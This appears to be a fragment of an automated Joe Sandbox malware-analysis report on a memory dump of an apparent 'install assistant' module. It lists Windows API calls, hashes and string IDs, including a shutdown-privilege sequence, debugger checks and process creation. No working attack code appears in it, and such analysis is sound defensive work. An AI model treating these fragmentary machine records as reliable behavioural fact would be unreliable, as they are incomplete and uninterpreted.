                              • Instruction Fuzzy Hash: FC1136B450C355EFD7108B28D54490EBBE4BF86325F148E5AF9A8CBA91D335CC888B62
                              APIs
                              • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6C1FABA7
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                               • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: FileRead
                              • String ID: $53N!$53N!$H$I_#]$J_#]$J_#]$Y<Uq$Y<Uq$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$f@n`$f@n`$jinc$|
                              • API String ID: 2738559852-1563143607
                              • Opcode ID: b24f039fb7170313fb1cfe26954c05f4ab6bf82100ea86e6be43c3fd7029137a
                              • Instruction ID: 482f91a11a9d2dbfb2db402a37c2f093516bae9bbff77b3d878a972b7cf5b504
                              • Opcode Fuzzy Hash: b24f039fb7170313fb1cfe26954c05f4ab6bf82100ea86e6be43c3fd7029137a
                              • Instruction Fuzzy Hash: 8662597060D3818FC725CF18C490A5ABBE2AFDA314F248D5EE9A9CB751D739D8468B43

                               Control-flow Graph
                               [graph image not reproduced; entry block 6c23cad3, nodes call GetConsoleMode, ReadFile, ReadConsoleW, GetLastError]
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                               • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: 8Q
                              • API String ID: 0-4022487301
                              • Opcode ID: c99e3b399db885dbcc3330eb591389db1cfa699b9be6660133b9b5dec4d7761b
                              • Instruction ID: 3d9be2cacbeff21bedc94ecd00dc09a2bd2a40a6f6c0c221c9930d3104aaa0f0
                              • Opcode Fuzzy Hash: c99e3b399db885dbcc3330eb591389db1cfa699b9be6660133b9b5dec4d7761b
                              • Instruction Fuzzy Hash: EFC138B5A0423E9FDF01EF98C880BADBBB4AF4A714F105259FD18A7781C7749905CB20

                               Control-flow Graph
                               [graph image not reproduced; entry block 6c24406c, nodes call GetFileType, GetLastError, CloseHandle]
                              APIs
                                • Part of subcall function 6C244457: CreateFileW.KERNEL32(00000000,00000000,?,6C244115,?,?,00000000,?,6C244115,00000000,0000000C), ref: 6C244474
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C244180
                              • __dosmaperr.LIBCMT ref: 6C244187
                              • GetFileType.KERNEL32(00000000), ref: 6C244193
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C24419D
                              • __dosmaperr.LIBCMT ref: 6C2441A6
                              • CloseHandle.KERNEL32(00000000), ref: 6C2441C6
                              • CloseHandle.KERNEL32(6C23B0D0), ref: 6C244313
                              • GetLastError.KERNEL32 ref: 6C244345
                              • __dosmaperr.LIBCMT ref: 6C24434C
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                               • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                              • String ID: 8Q
                              • API String ID: 4237864984-4022487301
                              • Opcode ID: d8d3d86e5c678d4d77029b92a4bc55af9d9e8f8b3551ac49de6c0e11f25174a0
                              • Instruction ID: 09568a4a4943c1be8a0821f3b022f4da6d2cdbba77989ab5614c047b21de9a54
                              • Opcode Fuzzy Hash: d8d3d86e5c678d4d77029b92a4bc55af9d9e8f8b3551ac49de6c0e11f25174a0
                              • Instruction Fuzzy Hash: 78A13632A1415D9FCF0DCF68C851BAE7BB1AB46329F28825DEC11EB790CB358916CB51

                               Control-flow Graph
                               [graph image not reproduced; entry block 6c1fc1e0, nodes call WriteFile, ReadFile]
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                               • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: :uW$;uW$;uW$> 4!$> 4!
                              • API String ID: 0-4100612575
                              • Opcode ID: ada69674a0efa3539f3e362104820a551bbc5df3713ca8365216207113a52f18
                              • Instruction ID: 931cd33b3188dfbf33e77a9cd6787571f9ed467b7878d0265f162d66b05ec67d
                              • Opcode Fuzzy Hash: ada69674a0efa3539f3e362104820a551bbc5df3713ca8365216207113a52f18
                              • Instruction Fuzzy Hash: C0718DB0208345AFD720DF54C890B9ABBF4FF8A708F10492EF4A8D7650D375D849AB92
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                               • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: K?Jo$K?Jo$`Rlx$7eO
                              • API String ID: 0-174837320
                              • Opcode ID: ce5341f0f52b305241250ba58317db5b08a478a5aa0b5958f1fa40c62f47fc58
                              • Instruction ID: d7c4925664b03cfbb9d87559628e1bfa49452597e06e0ec1a4479540fc2fec31
                              • Opcode Fuzzy Hash: ce5341f0f52b305241250ba58317db5b08a478a5aa0b5958f1fa40c62f47fc58
                              • Instruction Fuzzy Hash: 3C4258B4609342CFC754CF58C090A5ABBE1AFDA314F248E1EE5A587B61D738E846CB53
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                               • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: ;T55
                              • API String ID: 0-2572755013
                              • Opcode ID: 2a2fbee1d7c9a3d2eba2cc7c08c94828287c2b71070dfaeb5433c2f1a8836cac
                              • Instruction ID: 63e8c5f9dca0f475b8818ae9001d9aec0f6c3b33c8e1f4f2a87eee1b60ab1692
                              • Opcode Fuzzy Hash: 2a2fbee1d7c9a3d2eba2cc7c08c94828287c2b71070dfaeb5433c2f1a8836cac
                              • Instruction Fuzzy Hash: CB030375644B018FC728CF68C8D079AB7E3AFD5328759CB2DC0A64BA95DB35B44ACB40

                               Control-flow Graph
                               [graph image not reproduced; entry block 6c224ff0, nodes call CreateProcessA, WaitForSingleObject, CloseHandle]
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                               • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: CreateProcess
                              • String ID: D
                              • API String ID: 963392458-2746444292
                              • Opcode ID: fe866f00ac0c20538e8acf9f87f2f30f50def09d93f50f0c859861227a65d47c
                              • Instruction ID: b96903fcb37624cda64eee47086f62b51a3a8992937ecfc67640d62c50b1f0b0
                              • Opcode Fuzzy Hash: fe866f00ac0c20538e8acf9f87f2f30f50def09d93f50f0c859861227a65d47c
                              • Instruction Fuzzy Hash: 0131E2708193808FD740DF29D198B2ABBF0EB9A318F509A1DF8D996250E7799588CF43

                               Control-flow Graph
                               [graph image not reproduced; entry block 6c23bc5e, nodes call WriteFile, GetLastError]
                              APIs
                                • Part of subcall function 6C23BEB1: GetConsoleCP.KERNEL32(?,6C23B0D0,?), ref: 6C23BEF9
                              • WriteFile.KERNEL32(?,?,6C2446EC,00000000,00000000,?,00000000,00000000,6C245AB6,00000000,00000000,?,00000000,6C23B0D0,6C2446EC,00000000), ref: 6C23BDAF
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C2446EC,6C23B0D0,00000000,?,?,?,?,00000000,?), ref: 6C23BDB9
                              • __dosmaperr.LIBCMT ref: 6C23BDFE
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                               • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ConsoleErrorFileLastWrite__dosmaperr
                              • String ID: 8Q
                              • API String ID: 251514795-4022487301
                              • Opcode ID: 4cc70eef4455c9a5328690ad4f23f602842eeda07104f513af94032717a30ea2
                              • Instruction ID: bdac1defdb3706c61c3ba50d86159d39861c3b969ff05139b0e487d96e03be90
                              • Instruction Fuzzy Hash: 8651D8B5A0062EAFDB01DFA8C840FEEB778EF49319F141555ED08A7691D734D9058760

                              APIs
                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C225D31
                              Similarity
                              • API ID: Ios_base_dtorstd::ios_base::_
                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                              • API String ID: 323602529-1866435925
                              • Opcode ID: 04499e68ce6e24e397d4d7692b3bdab9de31861c5e468446bb81a501bdca5c0b
                              • Instruction ID: fc8da2ece3d41609b5b5b30e2dd499d43410902329368b6dd02008bf9f11dda5
                              • Instruction Fuzzy Hash: 255124B5900B448FD725CF19C485B97BBF1BB48318F408A2DD89647B90D779B90ACB90

                              APIs
                              • CloseHandle.KERNEL32(00000000,?,00000000,?,6C24425F), ref: 6C23B97B
                              • GetLastError.KERNEL32(?,00000000,?,6C24425F), ref: 6C23B985
                              • __dosmaperr.LIBCMT ref: 6C23B9B0
                              Similarity
                              • API ID: CloseErrorHandleLast__dosmaperr
                              • String ID:
                              • API String ID: 2583163307-0
                              • Opcode ID: 3de774f4666866d5eeab36bf225bad76731bea6adde9a88f171eba59c149e9b2
                              • Instruction ID: 64ff955cec4b9a0b2ab78869f725cad4ff33e3a85ca026b36d6d5a7ddc516c76
                              • Instruction Fuzzy Hash: C0014833B0593C1BC6048B3AA445BAE77694B8373DF296309FC1D87AC0CB60C9898690

                              Similarity
                              • API ID:
                              • String ID: 8Q
                              • API String ID: 0-4022487301
                              • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                              • Instruction ID: 653c699208f0f0a31fe7dfe346e423a35de30f8d9a6a683060d1519abe6ff8df
                              • Instruction Fuzzy Hash: 61F0D1F250177C6AC6211A2A8C04BCB37A99F8237CF102B15EC6C97ED0DB74D40AC6B1
                              APIs
                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C225AB4
                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C225AF4
                              Similarity
                              • API ID: Ios_base_dtorstd::ios_base::_
                              • String ID:
                              • API String ID: 323602529-0
                              • Opcode ID: 0a9c92fb644b02d9e616b35f36190d26d4b5c17deefed550546436b593e3eb36
                              • Instruction ID: d9bc4458262fdf3a9e6e392890037f155949473a2b910c56fa7690643fc284ad
                              • Instruction Fuzzy Hash: 52513A71201B04DBD725CF25C485BE6FBF4BB04718F448A1CE8AA4BBA1DB34B549CB81
                              APIs
                              • GetLastError.KERNEL32(6C256DD8,0000000C), ref: 6C22EF52
                              • ExitThread.KERNEL32 ref: 6C22EF59
                              Similarity
                              • API ID: ErrorExitLastThread
                              • String ID:
                              • API String ID: 1611280651-0
                              • Opcode ID: 398d58833eba068ac6a554b74eee086be01bdc83b38c786261af014fe3a8c95e
                              • Instruction ID: acfc9bba29e42fbd3140da7f96fcc8c9194ce2dd86f9902051ffa851f5841969
                              • Instruction Fuzzy Hash: 96F028B150020C9FCF01AB70C409AAE7B74FF41316F104148E80997B40CF385915DB91
                              Similarity
                              • API ID: __wsopen_s
                              • String ID:
                              • API String ID: 3347428461-0
                              • Opcode ID: 9866465296c7d2891e5056fa694211678ef422108a65c17350269c5cc1d1ec3d
                              • Instruction ID: a618c949c0f0cbae9011b2fad743970a72d6ff2def7e120ee0b8897426cbc902
                              • Instruction Fuzzy Hash: B61136B1A0420EAFCF05CF59E945A9B7BF8EF49318F154069F809AB311D671E911CBA4
                              Similarity
                              • API ID: _free
                              • String ID:
                              • API String ID: 269201875-0
                              • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                              • Instruction ID: 67a4f8f8478be660e1e7a4ace59b0525c5e995ea5b46047fbc9d53ed74e1b753
                              • Instruction Fuzzy Hash: 60014F72C0115DBFCF059FA8CD04AEE7FB5AF08214F144165FD24E26A0EB318A24DB91
                              APIs
                              • CreateFileW.KERNEL32(00000000,00000000,?,6C244115,?,?,00000000,?,6C244115,00000000,0000000C), ref: 6C244474
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: e4af2344fc419934e08eec0c36a810aab8071899cdab192e47e8f98fd54f7736
                              • Instruction ID: 66bad214d6e0c8d12cb90828a18e8956da454413607230518d828cea3b14c5cb
                              • Instruction Fuzzy Hash: 9FD06C3250010DBBDF028F84DC06EDA7BAAFB88714F014000BE1856060C732E871EB90
                              Similarity
                              • API ID: _strlen
                              • String ID: g)''
                              • API String ID: 4218353326-3487984327
                              • Opcode ID: c8b3518d00be24b20fd5a24fe121bc3da393e263560e2a778e797767aff3bb31
                              • Instruction ID: 180bb855d04dc52762cae1ece1f68c33719900445420d2cdedd811d4c5ac8f20
                              • Instruction Fuzzy Hash: 43631571654B068FC728CF28C4C0A95B7F3BFD53287198A2DC8D64BA55EB79B44ACB40
                              APIs
                              • GetCurrentProcess.KERNEL32 ref: 6C225D6A
                              • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 6C225D76
                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6C225D84
                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 6C225DAB
                              • NtInitiatePowerAction.NTDLL ref: 6C225DBF
                              Similarity
                              • API ID: ProcessToken$ActionAdjustCurrentInitiateLookupOpenPowerPrivilegePrivilegesValue
                              • String ID: SeShutdownPrivilege
                              • API String ID: 3256374457-3733053543
                              • Opcode ID: caccc3565d8d84873c3efdb5825395d64670d9a0506b40539a23af648514957c
                              • Instruction ID: 4bcb91f8adb0c9e7f28f66168892e65bf20a924e4fba8d81a88dfa0dca76ffd2
                              • Instruction Fuzzy Hash: 5DF05470644304BBEE00BF24DD0EF5A7BB8EF45705F01491CF985A61D1D7B86998CB92
                              Similarity
                              • API ID:
                              • String ID: \j`7$\j`7$j
                              • API String ID: 0-3644614255
                              • Opcode ID: bdc9a0625a41a823d38bdf4347a89402d60083359ef4e0f72f6ca2781e2a8306
                              • Instruction ID: 0c17fac2cc3bab748eed96ac1782a55a8f3e671643cc1636eb638c7f9d68131f
                              • Instruction Fuzzy Hash: 19421374609382CFCB14CFA9C49065EBBE1ABCA354F144A2EE499D77A2D334D846CB53
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C286CE5
                                • Part of subcall function 6C25CC2A: __EH_prolog.LIBCMT ref: 6C25CC2F
                                • Part of subcall function 6C25E6A6: __EH_prolog.LIBCMT ref: 6C25E6AB
                                • Part of subcall function 6C286A0E: __EH_prolog.LIBCMT ref: 6C286A13
                                • Part of subcall function 6C286837: __EH_prolog.LIBCMT ref: 6C28683C
                                • Part of subcall function 6C28A143: __EH_prolog.LIBCMT ref: 6C28A148
                                • Part of subcall function 6C28A143: ctype.LIBCPMT ref: 6C28A16C
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                              Similarity
                              • API ID: H_prolog$ctype
                              • String ID:
                              • API String ID: 1039218491-3916222277
                              • Opcode ID: 098dff2231b0858f17f8b87dde5ab3f8fadd385b4ae7cbdd9e046d221faa4b6f
                              • Instruction ID: 3fa47cc316097b640f4856fb4914ccbcd42a056ae585962b912d097560f35951
                              • Instruction Fuzzy Hash: 2003BE3090628DDEDF11DFA4C880BDDBBB0AF15308F144099E849A7AD1DB746B9DDB62
                              APIs
                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6C230279
                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 6C230283
                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 6C230290
                              Similarity
                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                              • String ID:
                              • API String ID: 3906539128-0
                              • Opcode ID: 5a8c6e7991d6873e1b7c3e353eac85e91afc2c9486301e4c405a50ab9141487b
                              • Instruction ID: dce4c908a01d2038a7ab39455bd8b6130e3d7b72d1ba4875dd1a5a5d4fece9a1
                              • Opcode Fuzzy Hash: 5a8c6e7991d6873e1b7c3e353eac85e91afc2c9486301e4c405a50ab9141487b
                              • Instruction Fuzzy Hash: 8B31C47590122D9BCB21DF29D8887CDBBB8BF08315F5041DAE81DA7290EB749B858F54
                              APIs
                              • GetCurrentProcess.KERNEL32(?,?,6C22F235,?,?,?,?), ref: 6C22F19F
                              • TerminateProcess.KERNEL32(00000000,?,6C22F235,?,?,?,?), ref: 6C22F1A6
                              • ExitProcess.KERNEL32 ref: 6C22F1B8
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: Process$CurrentExitTerminate
                              • String ID:
                              • API String ID: 1703294689-0
                              • Opcode ID: 47b21a9658ef6118788d3f685db22640e4d6fe8a4e538049a0c6f91e294bdf7a
                              • Instruction ID: 76bf4221aeb9f23ca83a12823b5a220629eb25fda9b304a53e06c6b93b00d0b6
                              • Opcode Fuzzy Hash: 47b21a9658ef6118788d3f685db22640e4d6fe8a4e538049a0c6f91e294bdf7a
                              • Instruction Fuzzy Hash: A5E0B63210121CAFDF026F59C84CA9A7B79FB86257B914414FC19C6661CB39EDA1CA50
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: x=J
                              • API String ID: 3519838083-1497497802
                              • Opcode ID: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                              • Instruction ID: aa2f420d101dc3ced299be3e0a2ab758e0e8d0d6d963684d89432186b205e9c3
                              • Opcode Fuzzy Hash: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                              • Instruction Fuzzy Hash: 6B91F4B1D1121E9ADF04EFA4C8909EFB775BF05308F90802AEC51A7A50DB72597ACB50
                              APIs
                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6C2278B0
                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6C2280D3
                                • Part of subcall function 6C229379: RaiseException.KERNEL32(E06D7363,00000001,00000003,6C2280BC,00000000,?,?,?,6C2280BC,?,6C25554C), ref: 6C2293D9
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ExceptionFeaturePresentProcessorRaisestd::invalid_argument::invalid_argument
                              • String ID:
                              • API String ID: 915016180-0
                              • Opcode ID: bb019d2db60715e84f393e9cdf0942cecf6564382923d5e3507e4e6a2391c3de
                              • Instruction ID: 1f224ebd542ac14dcc1b5d7521ac7332d9a3e80baa93f1e4abb2f915f541c76c
                              • Opcode Fuzzy Hash: bb019d2db60715e84f393e9cdf0942cecf6564382923d5e3507e4e6a2391c3de
                              • Instruction Fuzzy Hash: 70B18D72E042099BDF45CF55C88169EBBB9FB49319F24826EE815E7680D33CEA44CF90
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: @4J$DsL
                              • API String ID: 0-2004129199
                              • Opcode ID: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                              • Instruction ID: 95e38b36185b681f07d104e9fdce06967c016a2d9facea7aee7b732025096575
                              • Opcode Fuzzy Hash: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                              • Instruction Fuzzy Hash: AE2191376A49560BD74CCA28DC33EB97681E744305B88527EED5BCB7D1DF5C8800C648
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C27540F
                                • Part of subcall function 6C276137: __EH_prolog.LIBCMT ref: 6C27613C
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: 8552379c3bb9a98a981715b0c2d56659a9b66d2cd3d1a4f2db75c79318028cc2
                              • Instruction ID: 770dbba2a537635ea8b75fd8b034938bdc2eee3865963d4e82634cc7308c3d98
                              • Opcode Fuzzy Hash: 8552379c3bb9a98a981715b0c2d56659a9b66d2cd3d1a4f2db75c79318028cc2
                              • Instruction Fuzzy Hash: 5A62487190125ECFDF25CFA4C894BEDBBB5AF04309F14416AE815ABA80D7749A84CFA0
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
